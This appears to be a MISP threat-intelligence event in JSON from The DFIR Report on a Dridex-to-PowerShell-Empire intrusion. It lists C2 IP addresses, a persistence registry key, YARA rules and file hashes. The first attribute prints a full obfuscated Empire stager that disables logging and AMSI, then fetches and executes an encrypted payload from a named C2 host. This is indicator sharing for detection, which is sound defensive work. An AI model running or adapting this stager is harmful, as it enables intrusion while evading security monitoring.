adulau/misp-circl-feed
1
0
Fork 0
Code Issues 1 Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/misp/946e7701-5bdd-4efe-ae94-a6626fc8092b.json

3703 lines
2.1 MiB
JSON
Raw Normal View History

chg: [feed] added
2023-04-21 13:25:09 +00:00
{
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"Event": {
"analysis": "2",
"date": "2020-07-15",
"extends_uuid": "",
"info": "Dridex to Empire",
"publish_timestamp": "1596485147",
"published": true,
"threat_level_id": "3",
"timestamp": "1596485073",
"uuid": "946e7701-5bdd-4efe-ae94-a6626fc8092b",
"Orgc": {
"name": "The DFIR Report",
"uuid": "5e9e5d86-5b94-4ff6-b07e-4e3e950d210f"
},
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#10e874",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Powershell Empire",
"relationship_type": ""
},
{
"colour": "#0da700",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:tool=\"Dridex\"",
"relationship_type": ""
},
{
"colour": "#ffffff",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "tlp:white",
"relationship_type": ""
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594842943",
"to_ids": true,
"type": "text",
"uuid": "22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"value": "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845135",
"to_ids": true,
"type": "ip-dst",
"uuid": "39f56fa9-58f9-4962-a4e9-809182990f7d",
"value": "194.99.22.145",
"Tag": [
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#10e874",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Powershell Empire",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845114",
"to_ids": true,
"type": "ip-dst",
"uuid": "acb0c1a9-45b9-4442-986b-d10c0b5808af",
"value": "64.118.8.15",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845109",
"to_ids": true,
"type": "ip-dst",
"uuid": "2b113678-6c5c-4f92-b747-5fcd46fb9268",
"value": "59.148.253.194",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Persistence mechanism",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1595298092",
"to_ids": true,
"type": "regkey",
"uuid": "ef331607-0a3d-4770-b9da-33708b3e1a10",
"value": "\\HKEY_USERS\\S-1-5-21-1761595937-4212512506-1431507687-12106\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Zvhlxdonjwfvei"
},
{
"category": "Payload installation",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1595298165",
"to_ids": true,
"type": "filename",
"uuid": "6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"value": "%APPDATA%\\Microsoft\\SystemCertificates\\My\\CRLs\\swET\\bdechangepin.exe"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417742",
"to_ids": true,
"type": "ip-dst",
"uuid": "f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"value": "2.58.16.87",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417742",
"to_ids": true,
"type": "ip-dst",
"uuid": "587aa626-f57e-444e-b1c1-ab3491f99a10",
"value": "144.168.239.42",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"value": "216.52.109.40",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "da8a693e-6e63-4de8-a1ef-ef863052adb1",
"value": "88.129.221.43",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"value": "104.131.103.128",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"value": "54.39.34.24",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "64479ecc-ab45-495c-875d-42a2b7b2ce92",
"value": "192.99.103.228",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "c176ce15-acd2-4573-9991-8e19d4953c4f",
"value": "2.80.178.251",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417619",
"to_ids": true,
"type": "ip-dst",
"uuid": "e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"value": "75.170.61.45",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450057",
"to_ids": true,
"type": "ip-dst",
"uuid": "931290f5-12fd-493e-802f-4e9e132a6a0d",
"value": "199.66.90.63",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450034",
"to_ids": true,
"type": "ip-dst",
"uuid": "80882b5d-a04b-4963-a324-e9778acbaec6",
"value": "88.129.223.244",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450009",
"to_ids": true,
"type": "ip-dst",
"uuid": "f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"value": "209.74.126.2",
"Tag": [
{
"colour": "#ab022a",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "Dridex",
"relationship_type": ""
},
{
"colour": "#e200a3",
chg: [feed] updated
2024-04-05 12:15:17 +00:00
"local": false,
chg: [gen] updated
2023-12-14 14:30:15 +00:00
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596485073",
"to_ids": false,
"type": "yara",
"uuid": "984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"value": "/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"<ms:script implements-prefix=\\\"user\\\" language=\\\"JScript\\\">\" fullword wide\r\n $s6 = \"]]> </ms:script>\" fullword wide\r\n $s7 = \"</ms:script>\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide\r\n
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596457856",
"to_ids": false,
"type": "link",
"uuid": "5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"value": "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1594843203",
"uuid": "0537282b-b524-441b-bc04-7b894b342a40",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1594843203",
"to_ids": false,
"type": "text",
"uuid": "3f9c0725-773e-43c0-804f-d684b03092c9",
"value": ".rdar"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1594843203",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "0b837526-f8e1-4bcd-8ecb-329f516930ae",
"value": "16384"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1594843203",
"to_ids": false,
"type": "float",
"uuid": "fbbaae3e-27eb-4cd8-99da-a6f55838909d",
"value": "6.5945206832312"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1594843203",
"to_ids": true,
"type": "md5",
"uuid": "06c32bde-5608-47c4-a4fd-6ae4cc465b2e",
"value": "5963427cd562179e2c2225fa6e8bb5d5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1594843217",
"to_ids": true,
"type": "sha1",
"uuid": "2b7f6066-6112-4600-8489-d0acf3c87394",
"value": "5aea9aa2fbb76756ca7608fb2f0b50872cf9a919"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1594843231",
"to_ids": true,
"type": "sha256",
"uuid": "e657a30a-27c8-466a-978b-459476309d8e",
"value": "0384f96cf8498309325a168041880d52e9624f023a620316a7e4ffb94a20be92"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1594843245",
"to_ids": true,
"type": "sha512",
"uuid": "bf8b548b-1636-44e5-a5ee-2301f3e296d8",
"value": "2d1f364720fa192a1cdd1ea3c9f5febce804f172929447f42dc66105fe9b5b65a06484dce3284bec79997ef4df3d6870aa86713d3305996bab4e7ccdd0fdbcac"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1594843259",
"to_ids": true,
"type": "ssdeep",
"uuid": "6c94b9e8-233a-42f8-8734-9537e202d765",
"value": "192:bFGZboRzZ9QmDg//fOCVa/ott0dfwUVqFGN4W7OlKA8rof7/tpSEgxUajpiXjmIV:EB8ZvZbDdTTAf4owGI2Ee"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1594843275",
"uuid": "856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1594843275",
"to_ids": false,
"type": "text",
"uuid": "6cd4c038-ba0d-4603-ac3a-09673ea84425",
"value": ".rdata"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1594843275",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "b7f88d7f-93cc-4743-a1cd-170663465e33",
"value": "118784"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1594843276",
"to_ids": false,
"type": "float",
"uuid": "61f2e657-07fc-4915-8b08-289f836cacda",
"value": "7.9827191322039"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1594843276",
"to_ids": true,
"type": "md5",
"uuid": "401e2bf6-1ca8-4f40-acd8-9cb535d8309d",
"value": "edd63a0a668eb9c4231cdd5e0c81a044"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1594843290",
"to_ids": true,
"type": "sha1",
"uuid": "d7c0a094-afd8-4622-84d2-c18da9ff5c27",
"value": "a1238d408a37574e5525d9b9a820398f4d7ef82a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1594843304",
"to_ids": true,
"type": "sha256",
"uuid": "a1cfaabe-9bd2-4246-9e10-48dd45e63dc9",
"value": "bfdb1a8c3324799ae08883d1298961f885a93ba5706f87a51f0434f847f4632a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1594843319",
"to_ids": true,
"type": "sha512",
"uuid": "7ded34a2-3ce7-41d7-832d-83a91f4eddc6",
"value": "b8d20414f732017b2274a74cab74d109ebcb9ba7fbb5280f6bb33046994f1565a4ef0b928158fbc3e86a8b49dc4f00a1c1b30c01dfc89184f7f30acec5fb222c"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1594843332",
"to_ids": true,
"type": "ssdeep",
"uuid": "304a3fab-c5d1-4867-97ca-0efcbab42b49",
"value": "3072:KcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESR:f6hB5gBZ74XQN99R"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1594843346",
"uuid": "f5deb688-77b3-4f0b-b997-0692d1966239",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1594843347",
"to_ids": false,
"type": "text",
"uuid": "8065b3ba-8707-4d21-b142-9ce4ca830386",
"value": ".data"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1594843347",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "b425d073-04ea-42b5-a609-c1e85546562d",
"value": "69632"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1594843347",
"to_ids": false,
"type": "float",
"uuid": "6e7e11d3-86de-4136-bdbe-33cedbdafa36",
"value": "7.9479643160405"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1594843347",
"to_ids": true,
"type": "md5",
"uuid": "efa13f3c-4693-4a33-b9b1-933aff8436ec",
"value": "6d3bca57196c0913e08a876821f385e0"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1594843365",
"to_ids": true,
"type": "sha1",
"uuid": "6866de3c-4f27-4faf-b4e9-2aec6ab16222",
"value": "c67a629ab7662575eb6eac1c4e0a5daaffefdb15"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1594843392",
"to_ids": true,
"type": "sha256",
"uuid": "71cb2ef1-4b3f-4c77-b912-7a78eefc8a1a",
"value": "c5cb63c83c121d594c360584caf2a30fe7c5bed096d1abc5f9116e1e4f8113e0"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1594843404",
"to_ids": true,
"type": "sha512",
"uuid": "295f465b-62ea-43c6-8c60-41cf82e98820",
"value": "77143be8adb6e39cbdc21e8d9458d3fe6ffc36ebd9aa764e7b9e1e6e6e77eb6240fae09c2b321ea45dab580639b7766a1262b36499b0a75a90b81e0b55dae1ba"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1594843419",
"to_ids": true,
"type": "ssdeep",
"uuid": "d5561dc5-6e15-4b06-9c39-5aff4909045c",
"value": "1536:8lnx8E/msg8/rWJWVPRENX/HJSz+t95r49XAkr+it+a:gnxxgSrYGRQJSwrru"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1594843430",
"uuid": "30d4ea8b-bb35-4cc9-aa4d-b95f65834786",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1594843441",
"to_ids": false,
"type": "text",
"uuid": "6bdc308a-64c9-4365-8af4-6fcecc71d572",
"value": ".rsrc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1594843443",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "27f5226b-29e3-4d36-814e-92917d4d555b",
"value": "4096"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1594843443",
"to_ids": false,
"type": "float",
"uuid": "fea91540-ab3a-41e2-87c5-dea257aede25",
"value": "3.3548995614289"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1594843443",
"to_ids": true,
"type": "md5",
"uuid": "7c8a4b53-3bb3-4324-8756-6fe35a8cc64a",
"value": "f3cf17707906ead98cbc9697b3b73c5f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1594843456",
